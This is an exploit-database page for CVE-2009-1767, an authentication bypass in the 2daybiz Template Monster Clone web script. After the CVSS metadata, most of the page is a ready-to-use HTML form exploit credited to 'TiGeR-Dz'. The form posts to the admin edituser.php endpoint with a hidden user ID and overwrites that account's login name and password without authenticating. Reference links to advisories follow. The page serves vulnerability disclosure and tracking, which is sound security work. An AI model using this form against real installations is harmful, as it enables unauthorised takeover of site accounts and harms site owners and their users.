2daybiz Template Monster Clone (edituser.php) Change Pass Exploit

2009-05-25 / 2009-05-26
Credit: none
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-1767
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

<title> Template Monster Clone Change Password </title> </head> <head> </head> <body bgcolor="#000000"> <p><font size="6" color="#FF0000"><a href="http://www.2daybiz.com/"> <font color="#FF0000">2daybiz</font></a> Template Monster Clone&nbsp; </font></p> <TABLE border=0 width=780 align=center> <TR> <TD><TABLE width="100%" align="center"> <TR> <TD valign=top><!-- <TABLE width=200 > <TR> <TD > <TABLE > <TR> <TD><a href=showcategory.php>Add Categoty</a></TD> </TR> <TR> <TD><a href=addtemplatecategory.php>Add Templates</a></TD> </TR> <TR> <TD><a href=addcategory.php>Edit Templates</a></TD> </TR> <TR> <TD><a href=addcategory.php>Show Templates</a></TD> </TR> </TABLE> </TD> </TR> </TABLE> --></TD> <TD> <!-- this is the main section --> <table><tr><td><table><tr><td><table width=300" border=0 ><tr><td width=90%> &nbsp;</td><td align=right width=10%>&nbsp;</td></tr></table></td></tr><td><form name=frmSignup method=post action =http://www.2daytemplates.com/admin/edituser.php?id=16 onSubmit="return submitHandler(document);"> <TABLE align="center"> <TR> <TD></TD> </TR> <TR> <TD>&nbsp;&nbsp</TD> </TR> <TR> <TD><font size="5">&nbsp;<font color="#FF0000">&nbsp;Login Name</font>e</font></TD> <TD><input type =text class=inputstyle name= loginname value = ></TD> </TR> <TR> <TD><font size="5">&nbsp;&nbsp;</font><font color="#FF0000"><font size="5">Password</font></font></TD> <TD><input type =text class=inputstyle name= password value = ></TD> </TR> <TR> <TD><font color="#FF0000" size="5">&nbsp;&nbsp;Email</font></TD> <TD><input type =text class=inputstyle name= email value = ></TD> </TR> <TR> <TD><font color="#FF0000" size="5">&nbsp;&nbsp;First Name</font></TD> <TD><input type =text class=inputstyle name= firstname value =></TD> </TR> <TR> <TD><font color="#FF0000" size="5">&nbsp;&nbsp;Last Name</font></TD> <TD><input type =text class=inputstyle name= lastname value =></TD> </TR> <TR> <TD colspan=4 align=center>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input class=inputstyle type = submit name=submit value=submit> <input type = hidden name=userid value = 16></TD> <TD></TD> </TR> </TABLE> </form></TD> </TR> </TABLE></TD></TR></TABLE></td> <!-- this end the main section --> </TR> </TABLE></TD> </TR> <TR> <TD></TD> </TR> </TABLE> </body> <p><font size="6" color="#FF0000">C</font><font size="5" color="#FF0000">od[3]d By TiGeR-Dz</font></p> <p><a href="mailto:Mail:Tiger.dz@live.com"><font color="#FF0000" size="6">Mail</font><font size="5" color="#FF0000">:</font><font size="5" color="#FFFFFF">Tiger.dz@live.com</font></a></p> <p><font size="5" color="#FF0000">Script:</font><font size="5" color="#FFFFFF">Template Monster Clone</font></p> <p><font size="5" color="#FF0000">Home:<a href="http://www.2daybiz.com/"><font color="#FFFFFF">http://www.2daybiz.com/</font></a></font></p> <p><font size="5" color="#FF0000">Download:</font><font size="5" color="#FFFFFF">http://www.2daybiz.com/template_monster_download.html</font></p> <p align="center"> &nbsp;</p> <p align="center"> &nbsp;</p> </html>

References:

http://xforce.iss.net/xforce/xfdb/50561
http://www.securityfocus.com/bid/34977
http://www.milw0rm.com/exploits/8691
http://secunia.com/advisories/35090


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top